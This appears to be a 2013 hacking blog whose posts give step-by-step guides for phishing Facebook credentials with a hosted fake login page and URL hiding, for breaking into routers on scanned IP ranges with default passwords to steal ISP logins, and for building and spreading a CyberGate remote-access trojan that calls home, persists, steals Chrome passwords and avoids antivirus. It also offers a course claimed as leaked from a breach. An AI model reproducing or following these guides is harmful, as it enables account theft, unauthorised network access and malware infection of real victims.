Contact

Tuesday, 26 February 2013

HACK FACEBOOK ACCOUNTS (FINAL PHISHING)


HACK FACEBOOK ACCOUNTS (FINAL PHISHING)



GUYS MANY OF MY FRIENDS AND FANS ASKED ME HOW TO HACK THE 
FACE BOOK PASSWORDS.
THEY THINK THAT THERE IS A DIRECT SOFTWARE OR TOOL WHICH HACKS FACE BOOK ACCOUNTS.BUT THIS IS WRONG.NO ONE IN THIS WORLD WHO HACK THE FACE BOOK ACCOUNTS WITH PARTICULAR SOFTWARE.


Today, I will write tutorial on how to hack Face book  and dealing with a lot of problems along the way. 
This tutorial will be highly detailed with everything, including what you will need and all the thinking process necessary to successfully hack a Face book account.

THE ONLY METHODS IN THE WHOLE WORLD TO HACK FACE BOOK ACCOUNTS ARE :-

1) Key loggers
2) Rats
3) Phishing
4) Social Engineering


We will we use very popular method to hack face book account password.That is Phishing.
This is one of the best method to hack face book account password.
LATER ON I WILL GUIDE YOU WITH KEY-LOGGING RATS AND SE.





BEFORE STARTING PHISHING I WILL CLEAR YOU THE PERFECT CONCEPT OF PHISHING







What is phishing ?
Phishing is a technique of obtaining sensitive data such username,password,credit card details etc by an attacker by claiming to be a trusted or genuine organisation/company. 

The most common type of phishing is Fake Login Pages. The basic methodology of this attack is written below

1.Suppose an attacker wants to hack gmail/yahoo/facebook/bank account of the victim. Attacker creates a fake login page of that website . This fake login page looks exactly like real/genuine login page.

2.Attacker then sends the link of that fake login page to victim through an email or any other means.The sender's email Id is usually spoofed to give an authentic look to it.

3. Victim clicks on the link, fake login page appears in his browser and he enters his credentials in that page thinking that it is genuine.

4.The credentials that are username and password go to the attacker. Hence victim's account gets hacked.

5.Victim is then redirected to any webpage as chosen by attacker. Most probably the victim is redirected to genuine website or a page displaying an error.


I hope the idea is clear to you. 

This is the best method to hack anyone's gmail/yahoo/orkut/facebook/bank account.

Creating a fake login page is very simple. 

Then it depends on attacker's smartness that how he manages to fool the victim to get his credentials entered in fake login page. 

Simply this attack depends on attacker's intelligence as well as victim's carelessness.

OK NOW WE ALL HAVE CLEARED THE CONCEPT ABOUT PHISHING
COMMON LETS START PHISHING

How to set up the Phishing site, which is the Difficult task 
BUT I HAVE MADE YOU ALL VERY EASY!!!!!!

Step 1: 
The First Step in Making the site is to register an account 
CLICK HERE TO REGISTER AT 000WEBHOST.COM
(if you have account than you can skip first 2 steps




Step 2: 
Now Goto your email account that you gave and confirm your account with confirmation link

Step 3:
Now Download this PHISHING PACKAGE
THIS PHISHING PACKAGE IS THE ZIP FILE SO I RECOMMEND YOU DON'T OPEN IT OR EXTRACT IT.
JUST DOWNLOAD IT AND KEEP ON ONE SIDE.

Step 4:  
Now CLICK HERE and Log into your account.

 Step 5:
Now when you are logged into your account click on the Go to Cpanel  in front of your domain that you had registered, and then Go to File Manager under Files and log into it.


Step 6:
Now Click on the Public_html.



Step 7:
Now click on the Upload button, choose the PHISHING PACKAGE under the Archives that you have downloaded, to be uploaded.




Step 8
After Uploading go back and see weather all the files are uploaded correctly.

Thats Sit you PHISHING SITE IS READY NOW.

Now share the link of your phishing site in chating,Face book wall or any where whose account you want to hack or you can also give the fake mail with the name of face book by mailing phishing link.

(NOTE:- MOST OF THE PEOPLES DON'T KNOW WHERE IS THE PHISING LINK OR WHICH LINK THEY HAVE TO SHARE.
TO KNOW THE PHISHING LINK LOG-IN TO YOUR WEBHOST ACCOUNT
AND AFTER LOG-IN,IN THE RIGHT-HAND-SIDE YOU WILL SEE THE ACCOUNT INFORMATION IN THERE IS A FIRST LINE DOMAIN ,,,THE DOMAIN IS YOUR PHISHING LINK OK....)


STEP 9:
Now any one who visits your site would be taken to the Fake Face book Login Page. After they enter their User name and Password, they will be taken to THE REAL FACE BOOK LOGIN PAGE  So there is NO chance that it will be detected. 

STEP 10:
NOW TO SEE THE PASSWORD OF THE VICTIM ,LOGIN TO YOUR
WEB HOST ACCOUNT ,

CLICK ON FILE MANAGER AND AGAIN LOGIN THERE,

CLICK IN PUBLIC_HTML

NOW THERE YOU WILL SEE THE LAST FILE PASSWORD.TXT ,JUST CLICK ON VIEW IN THE RIGHT SIDE AND YOU WILL SEE THE USER NAME AND PASSWORD OF THE VICTIM 

THE EMAIL AND PASSWORD WILL LOOK LIKE THIS.



Now if you have successfully made the Phishing page(site) then you must know that on Face book you cannot post it, mail it, or sent it in chat.

This is because Face book don't allow the PHP HOSTING SITES. 
So Solution to this problem is to use .TK for the URL hiding.
All you have to do is to .TK on the main page enter your Phishers address and get a domain for that.
FINALLY FACE BOOK ALLOWS TO POST IT.

GOOD LUCK GOOD PHISHING 

A+(Hardware) and CCNA 5th Edition


A+(Hardware) and CCNA 5th Edition (Networking) Full Course By HackersZone {Limited Offer valid Till 31 Dec 2012}

Hii friends ...1 month ago i hacked the NIIT (NIIT THE BIGGEST INSTITUTE OF IT {Information Technology} IN INDIA)Database Systems and leaked the A+ and CCNA Course and  i told you that i will Share you the full course of Hardware and Networking with all my Hackers zone Lovers..Because of all you only We reach to this position ,and i always try to give things to you which in not for free on internet or which is Highly Demanded... So Finally Today i am Sharing this course....

Well your all thinking that why i shared this course So much late.....there are three Reason behind this :-
1) Because of my Exams are going ON...
2) my Parents Removed My Internet Connection...
3) Course Troubleshooting and Removing Restrictions from Course

These are the three main reasons for uploading this course For late , Then afterwards i got My new Internet Connection and then i uploaded Immediately. .


Okk Friends...Before Learning this course you have to do these things for Compulsory,otherwise you cant view this course...

1) Adobe Reader 6.0  

 It is compulsory Required this version of Adobe Reader Because The course is locked with it .
You can't view This Course On Latest ver of Adobe Reader or any ver after 6.0 .
Adobe Reader is given in Course iso file ,You can Install it After Mounting those ISO's

2) Daemon Tools 
 Daemon tools to Mount ISO Image....Or any WHich you Like to USE Easily. 


                                      CLICK HERE TO DOWNLOAD FULL COURSE 

 

Okk FINE.....

Now Download The course ...and execute it. (I Compressed the course iso'swith 7'z Software)

(NOTE :- After Executing you will get some dll file errors,Dont worry for that just press ok ok.
This error is because of Removing Restrictions) 

After executing ,Wait for two to three min For executing the file..Because The File is Highly Compressed. After Than you will get a small display ,Browse for the Location where you want to save The Course  ISO file.

After that you will Get 2 ISO files ( one for A+ Complete and other for CCNA)

Okk, then Mount those ISO's with Daemon Tools or any other ISO Mounting Software.

After Mounting You will GET Course Display ,
Accept that Agreement ,then Install Adobe reader 6.0 first,Then InstallELECTRONIC BOOK, This Contains the full Course.
(NOTE:- Electronic Book Will not run If you using any other ver or latest ver of Adobe reader ,only ver 6.0 will run this Electronic Book ,Because it islocked with it and iso.) 

 Thats SIT.Start Learning ,and  
BE A CERTIFIED HARDWARE AND NETWORK ENGINEER.

Download torrents without clients


Download torrents without clients

Remember such conditions?? when you want to download a torrent file and you find that the torrent client is missing mostly happens when you are using some ones else system or most probably you are in Cyber Cafe :P . And now who the hell gonna download a torrent client >_< just to download one torrent :P . So here we go

First Go HERE




Now just Browse your torrent there :) from “Browse” button , and Click Start Downloading.

Now the website will generate an exe file for you . Download that…  and then run .

Now you will see the your torrent getting downloaded :)

Enjoyyyy…..

Hack Remote Ethernet ADSL Router - Free Your ADSL Internet


Hack Remote Ethernet ADSL Router - Free Your ADSL Internet

IntroDuction :-

An ADSL router is also known as a DSL modem
The router is used to connect the computer to the DSL phone line for using the ADSL service. 
BSNL and MTNL rolled out many ADSL router cum modem during the peak days of rising internet customers in India.



These ADSL routers have a serious vulnerability in them, which most of you are not aware off .
In this post I will show you how to exploit this common vulnerability that lies in most ADSL routers so as to gain complete access to the router settings and ISP login details.



Hacking Remote ADSL Routers ( DSL modems ):-

Every DSL modem (router) comes with a user name and password using which it is possible to gain access to the router settings and configure the device.

The vulnerability actually lies in the Default user name and password that comes with the factory settings.

Usually the routers come preconfigured from the Internet Service providerand hence the users do not bother to change the password.

This makes it possible for the attackers to gain unauthorized access andmodify the router settings using a common set of default user names and passwords



Things Required :-

1. IP Scanner - To scan IPs
2. X-Pass
3. If you don't have Java installed , Download and Install Java , Click Here
4. Internet Explorer


Beginning with Scanning

1. Go HERE ,and note your IP address.

2. Open Angry IP scanner it will look like this:




3. Here you will see an option called IP Range, Now you will need an IP Range. Which is a range or a list of IP's you will have the IP scanner to scan.

4. So lets say your IP is 117.192.195.101 and you want to look for a vulnerable router in your area, you would set the range as 117.192.194.0 to 117.192.200.255 and that will give you a solid list of 100+ IPs in your area or generally close to your area.

5. Now Go to Tools->Preferences



6. Then under the under the ports tab under Port Selection type 80 'cos we will be interested in hosts with port 80 opened:



7. And on the display tab choose "Hosts with open ports only":



8. Then click OK to save the preferences and click start.

9. After a few minutes the scanner will show a list of  Ips with port 80 open.



10. Now just select one of the IP addresses and open it with INTERNET EXPLORER!!!



11. A webpage will open asking for a username and password, this is the login to their router

12. Now the trick is to abuse the fact that most people are too stupid to change their routers default factory setting router login details. 
So when it asks for a password and username try the most common router default logins which are: 

   UN          PwD
--------------------
admin -  admin  
admin -  password 
admin -  Leave the password blank.

13. Just enter the username-password as specified above and hit enter ,

If you are lucky you should gain access to the router settings page where you can modify any of the router settings. 
The settings page can vary from router to router. 
Here is the screenshot of one of the hacked router with default password settings.




14. If you do not succeed to gain access, select another IP from the list and repeat the step-13. At least 1 out of 5 IPs will have a default password and hence you will surely be able to gain access.

Exploitation 

Now for most of the routers you can find username in plain text and password covered with *'s when setting up a new connection, so just look for something that says connection wizard or connection setup, and follow the steps till you find the username and password as mentioned.


So why did we use Internet Explorer for this??

Because XPass works only with IE, we couldn't figure the pass out if we used Firefox or Chrome or Opera.

And now when we have the page where username and pass. are just open XPass click on the X sign and drag it over the *'s and you will have this:





Bingo, You Found The Username and Password 
password in this case is: 854179 

Finally You Steal an Internet Connection ,Now You can copy the ISP login details and close (logout)the Router Settings Page.

Now Login with The victims username and password and get unlimited download and Browsing.


Counter Measures:-


Most of the home routers are left out in default configuration state & can be hacked easily. The password vulnerability can easily exploited which later can result in havoc for a user. A little bit of user awareness is required to keep themselves safe.

1. If you are using an ADSL router to connect to the Internet, it is highly recommended that you immediately change your password to prevent any such attacks in the future. 
Since the configuration varies from router to router, you need to contact your ISP for details on how to change the password for your model.


2. Keep strong passwords rather than plain one's that can be easily guessed or brute forced.

3. Keep monitoring your routers logs.

4. Some new routers have option to disable remote access. It is recommended to disable any such remote access doors.

That's all. Stay safe and Be secure !


Warning!
All the information provided in this post are for educational purposes only. Please do not use this information for illegal purposes.

Hack The Hacker Using BinText


 Hack The Hacker Using BinText

What Is BinText :- 

BinText is a very fast and powerful text extractor  software used to extract text from application or any file.
It can extract email ID and password from applications like Hotmail Hacker, Gmail Hacker, Facebook Hacker or any Keyloggers and Stealers.

Step by Step usage :-

1) First of all Download The BinText .

Click Here To Download BinText Latest Version

2) Unzip the downloaded Bin Text software and open it.

NOTE - Some Anti-virus packages may falsely report this product as a Virus application.
Of course it will not ever be infected by any kind ofviruses/malwares/spywares.
It is simply a false positive detection because antivirus software does not to consider the possibility that a piece of software is able to perform such actions and should to be not detected


3) After Opening You Will Get The Main Screen Like This.



4) Now browse for the location where you have kept the Keylogger ,Stealer or any Facebook hacker file that the hacker has sent you to hack your PC.

5) Now Hit GO.

6) Bin Text will scan the whole file and display all the extracted text from that file which the hacker has sended you like this below.



7) Now scroll down till you find email address and password as I have shown in the screen shot.



8) We Got The User Name and Password of that file which the hacker sended us..

Hack(OWN) a Computer Using Cyber Gate Rat (Final/Closed)



Hack(OWN) a Computer Using Cyber Gate Rat (Final/Closed)

In this article, I am gonna post the most useful way on how to hack Computers ,email account passwords. 
This hacking software used to hack Computers ,All account passwords or we can say OWN the Computer is Cybergate RAT. 
RAT, as we all know, is Remote Administration Tool, used to hack computer remotely. 
Cybergate RAT is very efficient and simple to use to hack Systems Fully.




I will provide you with the cybergate paid version and it is cracked for you

IMPORTANT ---------
It is of course going to set off your antivirus.
As is it in fact a Trojan Virus and backdoor program.
The AV Detection Is False Positives, Dont Worry.
So i suggest turning your A/V off as it will delete the file automatically.
--------------------------


This is a straight forward RAT and is easy to use, with many different functions.

Ok,so lets get started:


Requirements:
-------------------->                 No-Ip.
-------------------->      CyberGate v1.07.5
-------------------->       Port Forwarding


Part 1 :- 
Setting Up The No-IP & Client 

1.Start Off By Going To; No-IP.com And Register. If You Have An Account There Already, Then Just Log In.

2. Once You've Logged In, Press "Add Host"



3. Now It's Time To Choose Your Host Name!





Hostname: Your Host Name (anyname you want), 
 
Host Type: DNS Host (Check On DNS Host)
Dont Care About The Rest, Once You've Choosen Your Host Name,rest leav as default.Press "Create Host" In The Lower Right Bottom.

4. The Host Is Now Finished! Lets Move On To The No-IP Client.

The No-IP Client You Downloaded In The Beginning, Extract It To Your Desktop & Install It.

Now When You've Installed It, Open It Up & Log In With Your No-ip Username & Password.

When You're Logged In Press "Select Hosts" And Then Check That Little Box With Your Hostname.




Note: Always Have No-IP Open When You Have Cybergate Open!

5. Your No-IP Host & Your No-IP Duc Is Now Sat Up! End Of Part 1.


PART 2 :-  Setting Up Cybergate 1.07.5

1.Cybergate File You Downloaded In The Beginning To Your Desktop!
 Once Extracted, Open It & Wait 20 Seconds For The Agreement To Pass! :)

2. When It's Open, Press: Control Center -> Start.


3. Press: Control Center -> Options -> Select Listening Ports.


4. Once You've Pressed The "Select Listening Ports" This Window Should Appear: 




Firstly, Write "100" In That Little Box And Press The Blue Arrow. Then It Should Appear Under "Active Ports"

Active Ports: The Port You Will Forward Later!

Connections Limit: The Max Amount Of Victims You Can Have.

Connection PW: The Connection Password. Use "123456"

[V] Show Password: (Shows Password)

Once This Is Done, Press "Save"!

5. Now We'll Go To The: Control Center -> Build -> Create Server.




User: First, Press "New" And Name It To: "Plutonium". Once Done, Press "OK"

Now Just Double Click On "Plutonium" Or Press "Plutonium" And Then Press "Forward"

6. Now We're In The "Connection" Tab.




First, Press "127.0.0.1 - 999" And Then Press Delete.

Now Press "Add" And Write Your Hostname In It + :100.

Like This: YourHostName.No-ip.biz:100

Change The Identification To: Cyber

Change The PW To: 123456

**Note, If You Want To Try The Server On Yourself, Then Delete Both:
- 127.0.0.1:999
-YourHostName.No-ip.biz

And Replace Them With; 127.0.0.1:100 Since 127.0.0.1 Means "Local Computer & LAN Internet"

7. Once You're Done With Theese, You'll Move On To The "Installation" Tab
 



 Have The Same Settings As I Do, And Follow The Instructions In The Image!

--//--//--//--//--//--//

Install Directory: Where The Server Installs,


%System%
%Windows%
%Root%
%Program Files%
%Other%

Use The "System"! :).

Boot: This Is The "Startup" Option. Have Everything Checked & Press "Random" 5 Times And It Will Startup On Your slave Everytime They Start Their Computer!

Directory: Where The Virus Folder Installs

File Name: What The File Will Be Inside The Folder.

Inject Into. What Process It Injects into, Use Default Browser!

[V] Persistance: Keeps Trying To Inject Until Succed.
[V] Hide File: Hides The File, (Not FUD Though!)
[V] CCD: Changes The Creation Date From 16th July To 4 September 2005.

Mutex: Mutex Of The Server, Just Press Random A Couple Of Times!

There We Go, You've Now Completed The "Installation" Tab!

--/ Skip The Message & Keylogger Since They Are Pre-Set Already!

8. You Should Now Have Trumbled Into The "Antis" Tab, Have Everything Checked! (Except SANDBOXIE If You Are Gonna TRY IT ON YOURSELF!)


9. 
Ok, The Final Tab.. "Creation Of The Server". Have Every Setting As Me!







[V] Use Icon: Yes
 

[V] Delayed Execution: (How Many Seconds It Takes Until Your Server Injects And They Pop Up In Your RAT)

[V] Google Chrome PW: Yes, Steals Their GC Passwords :)
[X] Bind Files: No, Get An Real Binder Instead! (Have Your Server Crypted Though First!)
[X] Compress With UPX: Makes The Server Smaller But More AV's Detects It!

10. There! Your RAT Is Now Fully Sat Up.


Part 3 :- Port Forwarding

1. Go To; Start > Run > CMD. And In The Command Box. Type: Ipconfig,

2. Now Look For Something Named: Default Gateway Or Standard Gateway. (Usually 192.168.1.0).. There Should Be like.. 10 Numbers, Remember Thoose.

3. Go To Your Internet Browser And Type Thoose Numbers In.

4. You Have Now Come To Your Router Page.

5. Lookup The "Virtual Server" Or "Port Forwarding" Page And Port Forward The Port:100

6. As Internet Protocols, Use BOTH Tcp And Udp For The RAT To Work.

7. Press "Save" Or "Apply"!

8. Go To: HERE

9. Write In Port: 100 And press Check!

10 If It Says: 
Success: I can see your service on ***.***.**.*** on port (100) Your ISP is not blocking port 100
Then You Have Succedfully Port Forwarded And Can Start Spreading Your RAT Virus! 

10. But If It Says:


Error: I could not see your service on ***.***.**.*** on port (82) Reason: Connection timed out
Then You Have NOT Port Forwarded Correctly, Just Try Until You Get It Forwarded !

For Further Help With Port Forwarding..  Visit HERE.


                                                                             OR


1. first download the program from HERE

2. after installed, run it and you will have somethin like this.

3.then choose your router ( usually the program detects it by itself )


4.to port forward,simply click " which ports you need to forward ".



5.choose " Add custom " 


6.  Enter a name ( anything ) and the ports you wanna forward for example 80~100



7.click Add.

8.In the main page,Click "update router"



THATS ALL!



Now, some FAQs ;

Q: What is CyberGate?
A: CyberGate is a remote administrative tool or trojan for Windows operating systems. You can use CyberGate to manage computers, monitoring your child etc.

Q: Where can I get CyberGate?
A: There is an website for CyberGate, but you can easily download it from my thread.

Q: What operating systems are supported by CyberGate?
A: Windows 95/95B
Windows 98/98SE
Windows ME
Windows NT 4.0
Windows 2000
Windows XP
Windows Vista
Windows 7

Q: Will CyberGate slow my computer?
A: No. CyberGate won't slow your computer, it is a small program and works in background and has been optimized to minimize resource use.

Q: When I downloaded CyberGate, I can't extract it, a problem occurs. What should I do?
A: That's because of your anti virus, they detect it as unwanted applications so your anti virus could prevent downloading. Disable your anti virus and try again.

Q: When I have downloaded CyberGate, my antivirus detect it as virus. What should I do?
A: Well, since RATs are hacktools, and all the hack tools are detected as viruses, Turkojan is detected as virus also. To download and install CyberGate you will need to turn off your anti-virus.

Q: Why should I use no-ip?
A: If you don't have a static IP, you're IP will change each time your Internet reconnects so the server won't be able to reach you. To prevent loosing victims because of your dynamic IP, you will need no-ip host.

Q: What should I do after I install my server?
A: After you install your server, you should spread it. 

Q: I've created a server, but I don't see it in the directory. Why?
A: That's caused by your antivirus. The server is detected, and it won't let it. I suggest you to remove or just simply de-activate your antivirus if you are going to use RATs.

Q: I've send my server to a friend on MSN, but he doesn't connect.
A: That's because he has an antivirus or firewall and it won't let him to connect in your RAT. To make it FUD, (Fully Undetectable), you should use a crypter.

Q: Is CyberGate illegal?
A: No. CyberGate is a legal RAT. The author of CyberGate created his program for legitimate purposes. For example, there are many legal activities. Parents can use keyloggers to protect their children from online abuse etc. Some people use it for stealing passwords, credit cards and more but it's not a software which breaks the law, but the person who uses it.

Q: Can CyberGate be used for legitimate purposes?
A: Yes. You can monitor your children online activity.. to make sure they don't visit pornographic websites. You can find out if someone uses your computer while you are away, ensure no one is accessing your personal files while you are away and more.



Quick Troubleshooting If Your RAT Doesent Work:

Non-Connecting RATs

Make Sure That....

1. ..You are properly port-forwarded if using a router.
2. ..You have the No-IP Client installed and running.
3. ..Your DNS entries are correctly spelled when building your server.
4. ..The password in Listening Ports and the password your server uses are identical.
5. ..You are Listening on the correct ports.
6. ..Your Firewall is letting connections through on the port you're listening on.
7. ..Your server is added to excluded files in your Antivirus and Firewall.

''//'' If You Have ANY Troubles With This, Feel Free To PM Me & I'll Reply As Fast As I Can.


Thank YOU :)